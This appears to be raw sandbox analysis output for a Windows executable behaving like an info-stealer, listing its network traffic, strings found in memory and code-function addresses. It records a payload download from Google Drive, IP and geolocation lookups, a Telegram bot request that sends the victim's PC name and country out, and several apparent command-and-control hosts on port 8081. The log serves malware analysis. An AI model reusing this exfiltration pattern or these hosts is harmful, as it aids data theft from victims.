            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49724 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_D8Pml6lMbIdvZPiehCG8Phc9LzH2U_A HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1_D8Pml6lMbIdvZPiehCG8Phc9LzH2U_A&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2007/03/2025%20/%2015:32:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 20:32:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034060000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: NDCNDvC27F.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: NDCNDvC27F.exe, 0000000A.00000002.3081387010.00000000351A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033FA1000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.000000003406F000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.000000003406F000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.000000003406F000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033FA1000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
            Source: NDCNDvC27F.exe, 0000000A.00000003.2125393372.0000000003930000.00000004.00000020.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000003.2125346923.0000000003930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: NDCNDvC27F.exe, 0000000A.00000002.3081387010.00000000351A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: NDCNDvC27F.exe, 0000000A.00000002.3081387010.00000000351A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: NDCNDvC27F.exe, 0000000A.00000002.3081387010.00000000351A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034027000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033FC6000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034058000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034027000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034022000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: NDCNDvC27F.exe, 0000000A.00000002.3059914659.00000000038B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: NDCNDvC27F.exe, 0000000A.00000002.3060207904.0000000005380000.00000004.00001000.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3059914659.00000000038F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1_D8Pml6lMbIdvZPiehCG8Phc9LzH2U_A
            Source: NDCNDvC27F.exe, 0000000A.00000003.2175472622.000000000392B000.00000004.00000020.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3059914659.000000000391B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: NDCNDvC27F.exe, 0000000A.00000003.2175472622.000000000392B000.00000004.00000020.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3059914659.000000000391B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/c
            Source: NDCNDvC27F.exe, 0000000A.00000003.2175555706.000000000392F000.00000004.00000020.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000003.2125393372.0000000003930000.00000004.00000020.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3059914659.000000000391B000.00000004.00000020.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000003.2125346923.0000000003930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_D8Pml6lMbIdvZPiehCG8Phc9LzH2U_A&export=download
            Source: NDCNDvC27F.exe, 0000000A.00000003.2175555706.000000000392F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_D8Pml6lMbIdvZPiehCG8Phc9LzH2U_A&export=downloade
            Source: NDCNDvC27F.exe, 0000000A.00000002.3081387010.00000000351A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: NDCNDvC27F.exe, 0000000A.00000002.3081387010.00000000351A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: NDCNDvC27F.exe, 0000000A.00000002.3081387010.00000000351A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: NDCNDvC27F.exe, 0000000A.00000002.3081387010.00000000351A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033F2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034060000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033FA1000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000033F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: NDCNDvC27F.exe, 0000000A.00000003.2125393372.0000000003930000.00000004.00000020.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000003.2125346923.0000000003930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: NDCNDvC27F.exe, 0000000A.00000002.3081387010.00000000351A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: NDCNDvC27F.exe, 0000000A.00000003.2125393372.0000000003930000.00000004.00000020.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000003.2125346923.0000000003930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: NDCNDvC27F.exe, 0000000A.00000003.2125393372.0000000003930000.00000004.00000020.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000003.2125346923.0000000003930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: NDCNDvC27F.exe, 0000000A.00000002.3081387010.00000000351A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: NDCNDvC27F.exe, 0000000A.00000003.2125393372.0000000003930000.00000004.00000020.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000003.2125346923.0000000003930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: NDCNDvC27F.exe, 0000000A.00000003.2125393372.0000000003930000.00000004.00000020.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000003.2125346923.0000000003930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034058000.00000004.00000800.00020000.00000000.sdmp, NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: NDCNDvC27F.exe, 0000000A.00000002.3080268352.0000000034053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.4:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405295
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040331C
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,10_2_0040331C
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_00404AD20_2_00404AD2
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 0_2_004064F70_2_004064F7
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_00404AD210_2_00404AD2
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_004064F710_2_004064F7
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360537010_2_03605370
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360D2D310_2_0360D2D3
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_036077AB10_2_036077AB
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360C5C010_2_0360C5C0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360D59F10_2_0360D59F
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360CA5810_2_0360CA58
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360597310_2_03605973
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360D86F10_2_0360D86F
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_03607F1810_2_03607F18
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360CFF710_2_0360CFF7
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360CD2F10_2_0360CD2F
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360ADD810_2_0360ADD8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360EC1810_2_0360EC18
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360C78810_2_0360C788
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360A41010_2_0360A410
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_03603AA110_2_03603AA1
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_036029EC10_2_036029EC
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360F80410_2_0360F804
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_03603E0910_2_03603E09
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360FC5210_2_0360FC52
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_0360EC1310_2_0360EC13
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_037D1F9810_2_037D1F98
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_037D1CB410_2_037D1CB4
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_037D0B4010_2_037D0B40
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_037D0B3B10_2_037D0B3B
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_037D7A7810_2_037D7A78
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_037D2C5110_2_037D2C51
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_037D1CA810_2_037D1CA8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_362096B010_2_362096B0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36202A9810_2_36202A98
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36200B3010_2_36200B30
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_362023B010_2_362023B0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_362053B010_2_362053B0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36201C5810_2_36201C58
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620EA2810_2_3620EA28
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620EA3810_2_3620EA38
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620EE8010_2_3620EE80
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36202A8810_2_36202A88
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620EE9010_2_3620EE90
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620F2E810_2_3620F2E8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620F2D910_2_3620F2D9
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36208F2510_2_36208F25
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36200B2710_2_36200B27
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36208F2810_2_36208F28
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620F73010_2_3620F730
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620F74010_2_3620F740
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36209FA010_2_36209FA0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_362023A410_2_362023A4
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_362053AB10_2_362053AB
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620FB8A10_2_3620FB8A
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620FB9810_2_3620FB98
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36208BF310_2_36208BF3
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620D02810_2_3620D028
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620003F10_2_3620003F
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620004010_2_36200040
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36201C4910_2_36201C49
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620D48010_2_3620D480
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_362098D010_2_362098D0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620D8D810_2_3620D8D8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620DD2110_2_3620DD21
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620DD3010_2_3620DD30
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620E18710_2_3620E187
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620E18810_2_3620E188
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620E5E010_2_3620E5E0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_3620E5D210_2_3620E5D2
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF81D010_2_36DF81D0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF97C010_2_36DF97C0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF8FB010_2_36DF8FB0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF7B7810_2_36DF7B78
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DFC0D010_2_36DFC0D0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF4ED010_2_36DF4ED0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DFA0D010_2_36DFA0D0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF4ECA10_2_36DF4ECA
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF72C810_2_36DF72C8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DFE0C010_2_36DFE0C0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DFC0C010_2_36DFC0C0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF08F010_2_36DF08F0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF22F010_2_36DF22F0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DFF2F010_2_36DFF2F0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DFA0E010_2_36DFA0E0
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF049810_2_36DF0498
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF1E9810_2_36DF1E98
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DFAE9010_2_36DFAE90
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF048910_2_36DF0489
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF648810_2_36DF6488
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DFCE8010_2_36DFCE80
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF38B810_2_36DF38B8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DF72B810_2_36DF72B8
            Source: C:\Users\user\Desktop\NDCNDvC27F.exeCode function: 10_2_36DFE0B010_2_36DFE0B0
